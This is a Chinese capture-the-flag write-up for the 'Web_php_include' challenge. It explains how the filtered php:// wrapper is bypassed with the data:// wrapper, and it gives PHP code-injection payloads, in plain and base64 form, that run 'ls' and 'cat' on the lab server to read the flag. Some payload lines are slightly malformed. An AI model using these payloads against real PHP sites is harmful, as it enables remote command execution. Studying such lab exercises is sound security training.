攻防世界-WEB-Web_php_include

打开靶机

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

payload如下:

html 复制代码
- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

html 复制代码
?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

拿到flag

相关推荐
Good_Starry7 分钟前
Java——正则表达式
java·开发语言·正则表达式
二哈喇子!12 分钟前
前端HTML、CSS、JS、VUE 汇总
开发语言·前端
欧洵.14 分钟前
Java.基于UDP协议的核心内容
java·开发语言·udp
情缘晓梦.21 分钟前
C语言数据存储
c语言·开发语言
xunyan623421 分钟前
第九章 JAVA常用类
java·开发语言
IOT-Power29 分钟前
QT 对话框(QDialog)中 accept、reject、exec、open的使用
开发语言·qt
froginwe1131 分钟前
ASP Session
开发语言
lbb 小魔仙39 分钟前
【Python】零基础学 Python 爬虫:从原理到反爬,构建企业级爬虫系统
开发语言·爬虫·python
Swift社区41 分钟前
ArkTS Web 组件里,如何通过 javaScriptProxy 让 JS 同步调用原生方法
开发语言·前端·javascript
Q741_14741 分钟前
海致星图招聘 数据库内核研发实习生 一轮笔试 总结复盘(1) 作答语言:C/C++ 链表 二叉树
开发语言·c++·经验分享·面试·笔试